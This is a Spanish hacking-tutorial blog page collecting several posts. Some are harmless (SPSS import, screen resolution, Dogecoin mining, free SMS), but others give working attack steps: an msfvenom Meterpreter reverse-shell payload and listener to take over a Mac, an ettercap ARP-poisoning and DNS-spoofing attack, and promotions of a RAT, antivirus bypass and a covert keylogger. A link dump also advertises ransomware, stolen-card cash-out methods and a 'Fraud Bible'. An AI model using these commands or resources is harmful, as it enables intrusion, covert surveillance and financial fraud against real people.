Showing posts with label tutoriales. Show all posts
Showing posts with label tutoriales. Show all posts

TUTORIAL - Mostrar el mando de juego de tu pc en tu transmisión con Gamepad viewer y streamlabs OBS

Este tutorial muestra como, mediante el uso de una pagina web denominada Gamepad viewer y streamlabs obs desde tu pc. Por favor dale like al video y suscríbete al canal para mas tutoriales de este tipo. ¿ tienes alguna sugerencia o alguna pregunta? déjala abajo en la caja de comentarios.

TUTORIAL - Como introducir una base de datos de Excel a SPSS

 

Un tutorial hecho para mostrar como se importa una base de data de excel desde spss statistics 25.

TUTORIAL: Como Empezar a Minar Dogecoins en menos de 5 minutos en tu PC fácil y rápido en Windows (con CPU o GPU) (PARA NOOBS)

Hola de nuevo a todos los lectores de este blog. El día de hoy he realizado un video en el cual muestro como podemos comenzar a minar nuestros propios dogecoins, de tal manera que puedas conseguir los tuyos propios sin tener que comprarlos, sino solo con la fuerza de tu pc. Esperamos que el tutorial sea de tu agrado y te suscribas al canal de Youtube para ayudarme a crecer. muchas gracias por tu atención.


TUTORIAL:

1) Primero debes descargar el software necesario Awesome miner.

2) Tras esto deberás instalarlo y abrirlo.

3) add new miner --> manager profile miner

4) Ponemos nombre al minador y seleccionamos nuestro profile (GPU o CPU)

5) damos finalizar y a continuación vemos como el minador es creado. Luego lo seleccionamos y vamos a la casilla de la barra superior que dice " opciones".

6) Click en la barra lateral izquierda en Profit switching y luego chuleamos Zergpool. Tras esto, ponemos nuestra dirección de Dogecoin en el formulario que vemos a continuación de Zergpool y le damos aceptar. 

7) clic en la barra lateral izquierda en online services, seleccionamos todo slos servicios de  Zergpool y le damos al boton que dice "bulk" que esta abajo a la derecha. Allí, chulearemos la casilla que dice "nueva constraseña" y pondremos en el formulario a continuacion la siguiente linea:

c=DOGE

8) En la barra baja a la derecha click en profile switching y verificar que todos los algoritmos están chuleados. si no lo están dar click en Select all.

9) Tras esto click derecho sobre el minador creado y dar click en el botón verde que dice Start. Si todo ha salido bien, el proceso de minado comenzara automáticamente. 

Tutorial - ¿Es posible hackear un MAC OS con Metasploit?



1) Enciende tu Kali y abre un terminal.

2) Escriba 


msfvenom -p python/meterpreter/reverse_tcp LHOST=(tu ip) LPORT=4444 > pyterpreter.py


Ahora pyterpreter.py debería aparecer en su carpeta de inicio


3)  Abra un nuevo terminal e inicie Metasploit escribiendo msfconsole y presione Enter. Necesitamos configurar un oyente para que cuando el script se ejecute en la computadora Mac se conecte instantáneamente a nuestra máquina de ataque.


msfconsole


4) En el nuevo terminal, escriba en uso multi/manejador y presione Enter


5) Ahora tenemos que configurar el PAYLOAD, el LHOST que es la dirección IP del atacante y el LPORT que es el puerto en el que queremos escuchar. Puede hacerlo ejecutando los siguientes comandos consecutivamente.


Establecer PAYLOAD python / meterpreter / reverse_tcp

conjunto LHOST (tu ip)

conjunto LPORT 4444


6) Para iniciar el controlador, ingrese este comando 


exploit -j -z


7) Ahora envíe el archivo pyterpreter.py a la máquina Mac y ejecútelo. 


Ingrese la sesión de comando -i 1 y presione Enter. Ahora debería poder interactuar con la máquina Mac.


¿Cómo puedo hacerlo?


Este comando simplemente significa "enviar una sesión bash interactiva a la dirección IP (tu IP) en el puerto TCP 4444."

Ataque de denegación de servicios (Denial of Services) - TUTORIAL +18


Créditos a ᏉᎥᏒᏬፚ del grupo DARKCODE 2.0 por la información

NO HAGAS ESTE ATAQUE CON MAQUINAS O REDES QUE NO SEAN TUYAS O NO TENGAS EL PERMISO DE USARLAS, PUEDE TRAER CONSECUENCIAS.

Un ataque de denegación de servicios (DoS) es un ataque básico que puede traer varias consecuencias se lo lleva a la acción. Podemos ver un claro ejemplo de este ataque en el año 2013 donde el ataque de una empresa inundo la red de correos basura produciendo la ralentización general de internet e incluso tuvo consecuencias tales como afectar puntos claves como el nudo central de Londres.

El objeto primordial de un ataque de denegación de servicios es negar el acceso a determinados servicios como lo es web, correo y el acceso remoto o una denegación del servicio total de un sistema. La caracterización es la inundación de una red con trafico basura, haciendo las conexiones más lentas y bloqueándolas totalmente interrumpiendo la comunicación entre máquinas.

DoS.png

Para realizar este ataque tenemos que usar una herramienta primordial llamada ettercap. Para empezar usaremos nuestro sistema operativo Kali Linux donde explicare paso por paso DoS.

Primero:

Abrimos nuestra terminal de comandos en Kali Linux donde vamos a verificar si tenemos instalado ettercap y la versión que estamos usando, usualmente viene instalada en el sistema operativo. Para eso en la línea de comandos escribimos:

~# ettercap -v

etter_v.png

En tal caso que no se tenga instalado podemos instalarlo con el comando:

~# sudo apt-get install ettercap

Segundo:

Usamos los comandos del programa ettercap para tener un hombre en el intermediario o “Man in the Middle” con los siguientes comandos:

~# ettercap -T -q -M arp:remote -i eth0 

Donde

-T significa texto solo en la interfaz.

-q significa silencio para no mostrar el contenido del paquete.

-M realizar un ataque mitm.

arp:remote Envenenar la tabla ARP

-i para elegir la interfaz de red; en mi caso es eth0

En nuestra terminal tendríamos lo siguiente:

ettertqm.png

Y ya tendríamos nuestro ataque casi listo!

Tercero:

Tal cual como vamos a redireccionar todo el trafico a una sola IP tenemos que escoger alguna IP de una pagina web donde podamos redireccionar todo el trafico de red a la misma IP. En este caso vamos a usar la pagina web corgi orgy para hacer la prueba.

Para esto tenemos que usar en nuestra linea de comandos la herramienta nslookup:

~# nslookup https://corgiorgy.com

Esta herramienta nos ayudara a sacar la IP de dicha pagina web.

nslookup.png

Cuarto:

Una vez ya obtenida la IP vamos a ponerla en un archivo de ettercap llamado etter.dns este archivo lo podemos encontrar en /etc/ettercap/. Lo que básicamente haremos sera poner la IP para señalar donde nosotros vamos a redirigir todo el trafico de red. Para entrar a esta carpeta usamos los comandos:

~# cd /etc/ettercap/

Ya una vez estado en la carpeta ettercap vamos a listar la carpeta para ver que archivos hay donde nosotros vamos a encontrar nuestro archivo etter.dns - Para listar los archivos usaremos el comando:

~# ls

y encontraremos algo como esto:

etcetter.png

Para editarlo podemos usar cualquier editor de texto donde en mi caso usare vim. Para usar vim y editar el archivo usaremos el comando:

vim etter.dns

Nos aparecerá esto:

etterdns1.png

TIPS PARA VIM

1 Para poner la tabla de números que aparecen en la imagen anterior presiona la tecla ESCAPE y escriba set nu

2 Para editar el archivo presione la tecla I para poder hacer algunos cambios en el archivo que veremos después.

3 Para guardar presione la tecla ESCAPE y escriba :w

4 Para salir escriba ESCAPE y :q!

Después de los pequeños tips nos dirigimos a la linea numero 59 y para redirigir el trabajo ponemos el asterisco (*) y la IP a la que se va a redirigirse.

etterdns3.png

Y guardamos. Debemos que tener en cuenta que todo este correcto en el archivo recuerden de escribir bien el asterisco (*) la letra A y la IP.

Quinto:

Una vez guardado nuestro archivo nos vamos de nuevo a nuestro programa ettercap donde debería estar corriendo y presionaos la tecla P para mirar las opciones. Nos aparecerá esto:

options.png

Ya estando ahi vamos a escribir:

dns_spoof

En este momento comenzara nuestro ataque!

poof2.png

En este momento todo el trafico que se este usando en la red donde estamos conectados a internet se ira a la IP que nosotros decidimos colocar, se ha denegado el acceso y las maquinas no podrán navegar a las paginas web al menos si es la pagina web que nosotros decidamos llevar el trafico.

Podemos ver que nuestras víctimas no tendrán acceso a internet y tendera que redirigirse a otro lugar.

error.png

El ataque esta completo.

Para acabar el ataque cuando nuestra herramienta ettercap este corriendo presionaremos la tecla Q para salir apropiadamente. En tal caso el ataque seguirá corriendo.

Ya cuando salgamos nos aparecerá esto:

done.png

Esto fue un ataque DoS.

Si alguien tiene alguna sugerencia, feedback, critica o quiere otro tutorial déjenme saber en los comentarios todos son bienvenidos a comentar y recuerda NO HAGAS ESTE ATAQUE CON MAQUINAS O REDES QUE NO SEAN TUYAS O NO TENGAS EL PERMISO DE USARLAS, PUEDE TRAER CONSECUENCIAS.

MEGAPOST: Hacking Básico y tutoriales de seguridad informática



Hola a todos los amigos, suscriptores y anons del blog. En esta ocasión vengo a traer a ustedes una compilación épica en forma de MEGAPOST de links de informática y de links que les serán muy útiles a la hora de testear sus habilidades como hackers, además de aprender un poco más sobre este mundo y todo lo que conlleva. Muchas gracias al grupo en Whatsapp de el club del hacker por haber recopilado los links.

⚡️ Los mejores sitios para testear su skills de hacking  ⚡️


https://pwnable.kr/

https://hack.me/

https://ctflearn.com/

https://google-gruyere.appspot.com/

https://www.root-me.org/en/

https://www.hackthebox.eu/

https://www.hacking-lab.com/

http://www.gameofhacks.com/

https://overthewire.org/

https://microcorruption.com/

https://www.hackthissite.org/pages/index/index.php

https://crackmes.one/

https://pentest.training/

https://www.hellboundhackers.org/

http://hax.tor.hu/

https://thisislegal.com/

https://tryhackme.com/


➖ Créditos: Assassin Hacker ➖


Ethical-hacking-from-scratch-to-advanced-technique by FMUdemyExpert

1TB Udemy Course

Complete Android Course 

Manning Course 

Udemy - CyberSecurity Collection

KaliLinux Complete Training Program From Scratch Course

Udemy - BugBounty Hunting Guide To an Advanced Earning Method

Udemy-Learn Ethical Hacking From Scratch

EthicalHacking With Python, JavaScript and Kalilinux

Hacking Course By DECSEC


Dedsec All Courses❤️

🔰BlackHat Hacking Course By DedSec🔰

 🔰Antivirus Evasion Course By DedSec🔰

 🔰Complete Course Of Android Hacking By DedSec🔰

 🔰Complete Course Of Kali Linux By DedSec🔰

 🔰Complete Course Of WiFi Hacking By DedSec🔰

 🔰ERC Course By DedSec🔰

 🔰Facebook And Instagram Hacking Course By DedSec🔰

 🔰Online Account cracking Course By DedSec🔰

 🔰Reverse Engineering Course By DedSec🔰

 🔰Dedsec Latest Fud Ransomware🔰

 🔰Spamming Course 🔰

DOWNLOAD LINK II III

Hacking Etico - Viruses y Troyanos para Sistemas Operativos

🔱 CONTENIDO

💥 Programas de espionaje

💥 Face-Hack

💥 Mediante-Phishing

💥 Fuerza Bruta

Entrenamiento para la Certificación de Red Hat RHCSA

MEGA CURSOS PREMIUM

Hacking Ético y Pentesting Avanzado

☁💉 Pentesting con SQLMAP - Master en SQL Injection Hacking sobre base de datos 💉☁

🔰  PSICOLOGIA OSCURA  🔰  

Links de hacking I II III IV V VI VII


🖇️ Nombre: Ingeniería Social para Pentester

🖇️ Peso: 1.22 GB

🖇️ Idioma: Español

🖇️ Formato: MP4 viene en rar

🖇️ Duración: 3 Horas

🖇️ Descripción: ¿Qué es exactamente? En su sentido más amplio, la Ingeniería Social se basa en la manipulación psicológica, es decir, intenta lograr que las demás personas hagan las cosas que uno quiere que hagan. Se basa en la interacción humana y está impulsada por personas que usan el engaño con el fin de viol4r los procedimientos de seguridad.

🖇️ A pedido de un man.

Link I II


Club Java Master: De Novato a Experto

Links I II III


DESCARGA ACRONIS

======{{👨🏻‍💻Soluciones Informática))=====

Link: I

Pass: ALFAELCRACK

Créditos para ALFAELCRACK


Algunos libros de programación

JavaScript de 0 con 60 ejercicios

Curso de bash scripting y automatización de procesos

ATAQUES. MITM

Deep web. Tor freenet y i2p privacidad y anonimato

Curso basico de ethical  hacking

Master en espionaje

Creación de Virus

CURSO SQL / DESDE LO BASICO.


GRAN PAQUETE DE CURSOS Y TUTORIALES


☣️CVV CC CASH OUT METHODS

☣️BEST RDP SITE WITH 80,000+ RDPs

☣️BEST SOCKS5 NETWORK:

☣️15 VIDEOS PACK:

☣️BTC TUTORIALS: [1][2][3]

🏴‍☠️FRAUD BIBLE 2019, 75,600+ ITEMS, 40GB

Password: Blackhatpakistan

➖➖➖➖➖➖➖➖➖➖➖➖➖➖

🔘CCNA Security Latest Course Download

🔘CCNA Wireless Latest Course Download

🔘CCNA Service Provider Latest Course Download

🔘CCNA Cyber Ops Latest Course Download

🔘CCNA Data Center Latest Course Download

🔘CCNA Routing and Switching Latest Course Download

🔘CCNA Cloud Latest Course Download

🔘CCNA Collaboration Latest Course Download


300TB de hacking

Curso de Hacking 

Reparación de celular 

Curso python desde cero 

Inteligencia Artificial (Python) 

Maestro C# 

REPARACIÓN DE CELULARES 

HERRAMIENTA PARA RECUPERAR ARCHIVOS DEL SISTEMA 

TWD 10 TEMPORADAS

ELECTRÓNICA DESDE 0 

CURSOS DE DISEÑO GRÁFICO 

INGLÉS

CURSO TRUCOS EXCEL 

PROGRAMACIÓN CEREBRAL 


#robothack:

* Caza recompensas de errores: guía para un método avanzado de ganancias *

* Bug Bounty: Hacking Android *

* Bug Bounty: Hacking Web *

* Burp Suite Bug Bounty Web Hacking desde Scratch *


Para que se entretengan un poco 

1: Administración de sistemas operativos

2: Administración de sistemas operativos

3: Ampliación de computadores

4: Análisis Forense

5: AnalisisForense

6: Anatomía ataque informático

7: Android

8: Anon99

9: Arduino

10: Arquitectura informática

11: ASP

12 : Redes

13: Software Libre

14: Auditorias wed

15: Auditorías Wed By aletinte

16: Blackdoor

17: BlackTack

18: BlackTack5

19: BlackTack 5 By Aletinte

20: Base de Datos

21: Base de datos By Aletinte

22: BaseDeDatos

23: Binarios

24: Programacion C

25: CGI

26: Cifrado-Vpn

28: Circuitos

29: CMD II

31: Comandos

32: Bluetooth

33: Cracking

34: Cracking by Aletinte

35: Criptografía

36: Criptografia

37: Cursos

38: Deep Web

39: Deface

40: Deidel-Deidel

41: DELPHI

42: Desarrollo de software

43: Desarrollo de software By Aletinte

44: Deteccion-colisiones

45: Deteccion-honeynets

46: Dinero electrónico

47: Diseño-Desarrollo honeypost

48: Electrónica

49: Ensamblador

50: Estudió

51: Extras

2: Firewall

53: Forense

54: Forense By Aletinte

55: Fortran

56: FORTRAN

57: General

58: Gene

Anonymus tools 

BUSCANDO VULNERABILIDAD

CREACION DE EXPLOITS 

CURSO DE BATCH

CURSO DE PERL+MANUALES

CURSO DE BOOTSTRAP 3

CURSO DE HTML

CURSO DE HTML Y CSS

CURSO DE LINUX

CURSO DE NODE

CURSO DE PYTHON

CURSO DE RESPONSIVE WEB DESING

CARPETA CURSO EH Y CEHv8

CURSO LENGUAJE JAVA SCRIPT

CV9 TOOLS

HACKING

EL ARTE DE LA INTRUICION

GUIA PROGRAMADOR

HACKING SPOSED

HACKING WIFI MIKROTIK

INTRODUCCIÓN DE ALGORITMOS

LIBRO DE AMENAZAS INFORMÁTICAS

LIBRO KALI

LIBRO EN BLOQUE

MAHYAN

MEGA PACK DE LIBROS , REDES E INFORMATICA

PROYECTOS DE ELECTRONICA

LIBROS DE HACKER

LIBROS DE INFORMATICA

VULNERABILIDADES WEB

MICROSOFT WINDOWS SERVER 2

ALGEBRA BALDOR

ANGULAR

Caza recompensas de errores: guía para un método avanzado de ganancias

* Bug Bounty: Hacking Android *

* Bug Bounty: Hacking Web *

* Erup Suite Bug Bounty Web Hacking desde Scratch *

Para que se entretengan un poco 1: Administración de sistemas operativos

2: Administración de sistemas operativos

3: Ampliación de computadores

4: Análisis Forense

5: AnalisisForense

6: Anatomía ataque informático

7: Android

8: Anon99

9: Arduino

10: Arquitectura informática

11: ASP

12 : Redes

13: Software Libre

14: Auditorias web

15: Auditorías Wed By aletinte

16: Blackdoor

17: BlackTack

18: BlackTack5

19: BlackTack 5 By Aletinte

20: Base de Datos

21: Base de datos By Aletinte

22: BaseDeDatos

23: Binarios

24: Programacion C

25: CGI

26: Cifrado-Vpn

28: Circuitos

29: CMD

30: COBOL

31: Comandos

32: Bluetooth

33: Cracking

34: Cracking by Aletinte

35: Criptografía

36: Criptografía

37: Cursos

38: Deep Wed

39: Deface

40: Deidel Deidel

41: DELPHI

42: Desarrollo de software

43: Desarrollo de software By Aletinte

44: Detecsion-coliciones

45: Deteccion-honeynets

46: Dinero electrónico

47: Diseño-Desarrollo honeypost

48: Electrónica

49: Ensamblador

50: Estudió

51: Extras

2: Firewall

53: Forense

54: Forense By Aletinte

55: Fortran

56: FORTRAN

57: General

58: Gene

Anonymus tools

BUSCANDO VULNERABILIDAD

CREACION DE EXPLOITS

CURSO DE BATCHS

CURSO DE PERL+MANUALES

CURSO DE BOOTSTRAP 3

CURSO DE HTML

CURSO DE HTML Y CSS

CURSO DE LINUX

CURSO DE NODE

CURSO DE PYTHON

CURSO DE RESPONSIVE WEB DESINGN

CARPETA CURSO EH Y CEHv8

CURSO LENGUAJE JAVA SCRIPT

CV9 TOOLS

HACKING

EL ARTE DE LA INTRUCION

GUIA PROGRAMADOR

HACKING XPOSED

HACKING WIFI MIKROTIK

INTRODUCCIÓN DE ALGORITMOS

LIBRO DE AMENAZAS INFORMÁTICAS

LIBRO KALI

LIBRO EN BLOQUE

MAHYAN

MEGA PACK DE LIBROS , REDES E INFORMATICA (REPETIDOS)

PROYECTOS DE ELECTRONICA

LIBROS DE HACKER

LIBROS DE INFORMATICA 

VULNERABILIDADES WEB

MICROSOFT WINDOWS SERVER 2

ALGEBRA BALDOR

ANGULAR


🧠Conocimiento informatico. 

Invierte tiempo en ti mismo y no te desesperes.

⭐️La paciencia es la clave del exito⭐️.


1: Administración de sistemas operativos

2: Administración de sistemas operativos

3: Ampliación de computadores

4: Análisis Forense

5: AnalisisForense

6: Anatomía ataque informático

7: Android

8: Anon99

9: Arduino

10: Arquitectura informática

11: ASP

12 : Redes

13: Software Libre

14: Auditorias web

15: Auditorías Wed By aletinte

16: Blackdoor

17: BlackTack

18: BlackTack5

19: BlackTack 5 By Aletinte

20: Base de Datos

21: Base de datos By Aletinte

22: BaseDeDatos

23: Binarios

24: Programacion C

25: CGI

26: Cifrado-Vpn

28: Circuitos

29: CMD

30: COBOL

31: Comandos

32: Bluetooth

33: Cracking

34: Cracking by Aletinte

35: Criptografía

36: Criptografía

37: Cursos

38: Deep Web

39: Deface

40: Deidel-Deidel

41: DELPHI

42: Desarrollo de software

43: Desarrollo de software By Aletinte

44: Deteccion-coliciones

45: Deteccion-honeynets

46: Dinero electrónico

47: Diseño-Desarrollo honeypost

48: Electrónica

49: Ensamblador

50: Estudió

51: Extras

52: Firewall

53: Forense

54: Forense By Aletinte

55: Fortran

56: FORTRAN

57: General

INTRODUCCIÓN A CIBERSEGURIDAD II III IV


MEGAPOST: ¿Qué es el Bitcoin y como puedo ganar Bitcoin gratis sin invertir?





Hola todos mis amigos y mis amigas lectores del blog sectemple.blogspot.com. El dia de hoy, vengo a traerles un pequeño tutorial que me han solicitado desde hace un tiempo en el canal de freakbizarro de youtube, sobre qué es el Bitcoin y cómo puedes ganar tus primeros bitcoin de una manera facil y rapida, tratando en este  caso, de hacer la información lo más verídica y fiable.

El contenido de este post es una recopilación de toda la información que por más de 10 años he investigado yo mismo en internet y he conseguido acumular después de haber pasado por un sinfín de negocios de estafadores, esquemas ponzi y falsas promesas de Bitcoins gratis. Siendo así, empecemos.


¿Que es el bitcoin?

El bitcoin en un criptomoneda, es decir, es un concepto bajo el cual el dinero no debe pertenecer a nadie y por lo tanto no hay bancos intermediarios en donde debes, por obligación, guardar tu dinero. También, esto significa que el costo de las transacciones se reduce drásticamente, acabando con el negocio directo de los bancos de cobrar por cada transacción que realices, solo por utilizar sus servicios. 

La criptodivisa vio la luz en 2009 cuando su autor, Satoshi Nakamoto, publicó el paper oficial que hacía realidad tan descabellada idea en su momento, pero que finalmente terminó convirtiéndose en la mejor alternativa al dinero físico. Cabe aclarar que al día de hoy sigue  siendo un misterio quién es su verdadero autor, ya que nunca se ha visto en publico. 

En si, la moneda se basa en la tecnología p2p (peer to peer), de tal manera que se garantizan dos de las características principales del dinero: No puede ser duplicado y puede ser dividido en hasta 9 partes, de tal manera que puede ser redistribuido fácilmente en caso de ser necesario.

A partir del bitcoin surgieron un sinfín de criptomonedas que trataron de emular su éxito  inicial. entre las más conocidas tenemos el dogecoin, el litecoin, el DASH y el Ethereum. Obviamente, esto se ve como una gran oportunidad para los  emprendedores que buscan ganarse unos cuantos dólares extra al mes.

Existen múltiples aspectos extra que pueden y deben ser tenidos en cuenta (Como el almacenamiento en frío o la especulación en el mercado de valores), pero como este es un tutorial para noobs, entonces nos mantendremos apegados a lo básico y a la información estrictamente necesaria. Solamente queda decir que esta moneda es especialmente buena para aquellas personas que quieren realizar transacciones y no quieren que se sepa que lo están haciendo, como hackers y personas que no creen en los bancos regulares.

¿Que debo hacer para empezar a ganar bitcoins?

Nada complicado; lo primero que debes hacer es conseguirte una billetera y para eso hay tres opciones:

- Te haces una cuenta en el blockchain principal blockchain.org y con ella, viene una billetera integrada.
- Te haces una billetera en el servicio recomendado por este blog holytransaction.com
- Te montas tu propio sistema de blockchain en tu pc (muy engorroso e innecesario, pero si eres una empresa que maneja el bitcoin como divisa es extremadamente necesario). No es un método recomendado para novatos.

Es ganar Bitcoin o cualquier otra criptodivisa a través de internet sin invertir?

Bajo mi criterio, primero es necesario saber cómo NO vas a ganar dinero en internet. Las estafas y los estafadores abundan en este mundo y si no estás concentrado, perderás más dinero del que realmente ganarás. Quedas advertido de antemano.

Entonces, Nunca ganarás bitcoins a través de:

Esquemas ponzi: estos esquemas terminan cayendo y casi siempre la gente pierde su dinero de una manera desastrosa por la avaricia. ¿ Te ofrecen ganar bitcoins con omnilife o herbalife o algo asi? Esquema ponzi seguro. ¿Te piden invertir pero son son claros con cómo se va a realizar la inversión? Ponzi seguro. 

Duplicadores de Bitcoin: Este es un tipo de estafa que vas  a encontrar muy a menudo. habrá quien te diga que, al ser una  moneda virtual, puede ser falsificada fácilmente y ofrece que, si le envias bitcoins, el te los devolverá  duplicados. Nada más apartado de la verdad,no existe una manera de duplicar bitcoins, es una mentira de los estafadores, ya que si en realidad haces esto, estarás perdiendo tu dinero muy fácilmente en un estafa y no habrá  ninguna forma de recuperarlo. 

Regalado: Si un príncipe nigeriano te ofrece 1000 bitcoins si le envías uno, entonces probablemente es una estafa. Nadie en al vida regala el dinero, siempre buscan algo, en general, estafarte, así que ten mucho cuidado. 

El bitcoin debe ser manejado com si fuera dinero y si hay estafadores que son capaces de quitartelo en la vida real, habrá estafadores que te lo quiten en el mundo virtual.

¿Como SI se pueden ganar bitcoins gratuitamente sin invertir?

Faucets: Por increíble que parezca hay unas paginas webs llamadas faucets que, si tu pones tu dirección de billetera, te regalaran cierta cantidad de “satoshis” que son la unidad del bitcoin, la cuál es 1x10 elevado a la -8. Si tu te andas buscando faucets todo el día podrás hacer algunos satoshis, inclusive hasta algunos dólares si eres persistente. A continuación te dejo los links  de los principales faucets  activos a a  2020 y que si pagan:

Bitcoinker: Este es uno de los faucets vieja escuela que aún sobreviven en internet. Es super sencillo: simplemente pegas tu dirección de  bitcoin, completas un captcha y ya está! bitcoins directos a tu biblioteca cada 5 minutos. 


Cointiply: Uno de los conceptos más nuevos, este faucet lo que hace es que te  ofrece Bitcoin gratis (Además de otras criptomonedas), pero además te permite apostar con ellos en varios juegos  de azar que podrían hacerte multiplicar tus satoshis. Una excelente opción con una gran GUI y bastante intuitiva.


FreeBitco.in: Otro faucet que te hacce  ganar Bitcoins gratis y además te da la oportunidad de jugar a juegos de azar con el. Está web es para aquellas personas que son un poco más experimentadas en el uso de bitcoin, ya que puedes retirar  y puedes consignar bitcoin en ella.

Ganar bitcoins con un blog

Primero que todo, tienes que saber que para poder ganar algún dinero con este método debes tener. 1) Un blog o una página web y. 2). Esta Web debe ofrecer un contenido de descargas, ya sean mods o archivos que tu página ofrece.


Ya sabiendo esto, te registras en coin.mg. Una vez te inscribas, ve a la barra del lado izquierdo y entra al link que dice Tools. Allí encontrarás un link que dice full page script. Le das click y  te encontrarás con dos opciones: la primera es que puedes incluir sitios, es decir, cada vez que alguien de click en una web que tu escojas el link se acorta y tu ganas unos cuantos bits de centavos. La otra es que puedes excluir sitios, opción que se recomienda, ya que aquí puedes poner la dirección de tu página o blog, haciendo que cualquier link externo a tu web sea acortado, haciendo que ganes dinero cada vez que alguien salga de tu blog hacia un link externo.

Ejemplo del acortador masivo para webs, excluyendo dominios de google.com

Luego de haber escogido tu opcion, es tan fácil como copiar el script y pegarlo dentro de tu blog. Esto hará que inmediatamente se active el script y tus links sean acortados al instante. Así, solo te resta esperar a ver como llegan personas a tu sitio y tu vas ganando dinero, sin prisas ni apuros, todo completamente legal.

Además de esto, coin.mg posee un sistema de referidos que permite que ganes comisiones según lo que ganen las personas que hayas remitido, por lo cuál también podrás ganar con tus amigos que tengan blogs o páginas web que quieran ser monetizadas. Para más información, visita el link que se encuentra en la descripción del video y suscríbete a coin.mg con el link que te dejo en la descripción. No siendo mas, este es el final del post y nos veremos en una próxima ocasión para más oportunidades de hacer dinero con tu blog o página web. Hasta luego.


Tutorial - Instalar Wifite en Termux


Tutorial sobre como instalar wifite en termux. No es necesario tener root.

Comandos utilizados

apt update && apt upgrade
apt install git proot wget
apt install python
apt install python2
git clone https://github.com/derv82/wifite
cd wifite
python2 wifite

Como cambiar la resolución de pantalla de Kali linux


Para cambiar la resolución usaremos el comando “xrandr” (X Resize & Rotate), ejecutamos:

root@kali:~# xrandr
Screen 0: minimum 64 x 64, current 1024 x 768, maximum 32000 x 32000
VBOX0 connected 1024×768+0+0 0mm x 0mm
   1024×768       60.0*+   60.0*
   1600×1200      60.0 
   1440×1050      60.0 
   1280×960       60.0 
   800×600        60.0 
   640×480        60.0 

Esto nos mostrará las resoluciones que podemos elegir, usando la opción –help podréis saber más sobre este comando.

Fuego creamos el nuevo modo que queremos  aplicar

root@kali:~# xrandr –newmode “1368x768_60.00”   85.25  1368 1440 1576 1784  768 771 781 798 -hsync +vsync

Vemos si esta ya creada la nueva resolución

root@kali:~# xrandr
Screen 0: minimum 64 x 64, current 1024 x 768, maximum 32000 x 32000
VBOX0 connected 1024×768+0+0 0mm x 0mm
   1024×768       60.0*+   60.0*
   1600×1200      60.0 
   1440×1050      60.0 
   1280×960       60.0 
   800×600        60.0 
   640×480        60.0 
  1368x768_60.00 (0x154)   85.2MHz
        h: width  1368 start 1440 end 1576 total 1784 skew    0 clock   47.8KHz
        v: height  768 start  771 end  781 total  798           clock   59.9Hz

La ubicamos

root@kali:~# xrandr –addmode VBOX0 1368x768_60.00
root@kali:~# xrandr
Screen 0: minimum 64 x 64, current 1024 x 768, maximum 32000 x 32000
VBOX0 connected 1024×768+0+0 0mm x 0mm
   1024×768       60.0*+   60.0*
   1600×1200      60.0 
   1440×1050      60.0 
   1280×960       60.0 
   800×600        60.0 
   640×480        60.0 
   1368x768_60.00   59.9 

Y la aplicamos

root@kali:~# xrandr –output VBOX0 –mode 1368x768_60.00

Tutorial - Enviar mensajes de Whatsapp de manera automática a varios contactos - Bulk Whatsapp


Envía mensajes ilimitados a múltiples números a la vez en whatsapp.


Tutorial - Exploit Windows 7/8/10 usando VJ-RAT vb.net - Troyano en accion

Solo WhatsApp:    ----(   +1 650 338-3717   )----
Aquellos que quieran ayudarme en la programación,
y en seguir analizando la seguridad informática buscando vulnerabilidades.

Este programa fue hecho con la finalidad de ver la seguridad de los antivirus y de esa manera las empresas de antivirus nos den mas seguridad...

tamaño : 1.80 MB (1,895,424 bytes)
tamaño en disco: 1.80 MB (1,896,448 bytes)

Si su peso es diferente el programa ha sido modificado por un binder.


Tutorial: Sobrepasar Windows Defender y otros antivirus


01:10 Explicar las herramientas y técnicas.
08:00 Inicio de invocación-ofuscación
15:15 Resumen del bypass AV exitoso

Tutorial - Ardamax Keylogger


Ardamax Keylogger es un keylogger compacto, asequible, pero notablemente potente y flexible, destinado a la supervisión integral de las actividades de los usuarios en cualquier computadora en la que esté instalado. Operando silenciosamente en segundo plano, este software de monitoreo registra cada pulsación de tecla en el sistema del usuario y guarda todas las entradas en un archivo de registro cifrado confiable accesible exclusivamente para el administrador.

Aunque la mayoría de las personas ven el software espía como algo que no les gustaría que se usara en relación con ellos mismos, cambian rápidamente de opinión cuando se trata de su propia seguridad y la de quienes aman. Este keylogger de instalación remota es exactamente el tipo de software de monitoreo que puede responder las preguntas que lo han estado molestando durante mucho tiempo.

Tutorial: como instalar Ngrok en termux

Tutorial: como instalar Ngrok en Termux


Click aqui para descargar Ngrok

Tutorial: Configurar Termux para Hacking

Como configurar termux para hacking. 


Click aqui para descargar termux

Tutorial: Cómo enviar mensajes de texto SMS gratis con Gmail y Chrome a cualquier celular.


Bienvenidos a nuestro blog, donde les enseñaremos una manera fácil y legal de enviar mensajes de texto SMS gratis a cualquier celular. En este tutorial, les mostraremos cómo hacerlo mediante Gmail y Chrome utilizando una extensión llamada Send your email to SMS.

En primer lugar, es importante tener en cuenta que se requiere tener una cuenta de Gmail y el navegador Chrome instalado para poder utilizar esta extensión y enviar mensajes de texto de forma gratuita. Una vez que tenemos estas dos herramientas, procedemos a descargar la aplicación Send your email to SMS desde la Chrome Web Store e instalarla. Una vez que esté instalada, simplemente nos autenticamos en la aplicación y estamos listos para comenzar.

Para usar la extensión, simplemente vamos a nuestra cuenta de Google vinculada, creamos un nuevo mensaje y llenamos los campos obligatorios. Luego, en la parte inferior izquierda del nuevo correo, veremos un botón que dice "add phone numbers". Al hacer clic en este botón, podemos agregar el número al que deseamos enviar el mensaje como SMS. Finalmente, enviamos el correo y nuestro mensaje de texto gratuito será enviado.

Para aquellos que prefieren una guía visual, hemos preparado un tutorial en video que explica paso a paso cómo utilizar esta extensión para enviar mensajes de texto SMS gratuitos.

No se requiere conocimiento técnico o habilidades de hacking para utilizar esta extensión. Es una forma fácil y legal de enviar mensajes de texto gratuitos desde internet a cualquier celular en cualquier país.

Es importante destacar que nuestro objetivo principal es brindarles a nuestros lectores una forma gratuita y legal de enviar mensajes de texto SMS a cualquier celular. Además, nuestra comunidad es importante para nosotros, y por eso los invitamos a participar y crear una comunidad en los comentarios de este post. Compartan sus experiencias con la extensión, den sugerencias y hágannos saber si han encontrado formas alternativas de enviar mensajes de texto SMS gratuitos.

En resumen, el uso de la extensión Send your email to SMS es una forma fácil y legal de enviar mensajes de texto SMS gratuitos a cualquier celular. No se requiere conocimiento técnico, y funciona en cualquier país. Además, nuestro objetivo es brindar a nuestros lectores una forma gratuita y legal de enviar mensajes de texto SMS, y estamos siempre dispuestos a recibir sugerencias y comentarios de nuestra comunidad.

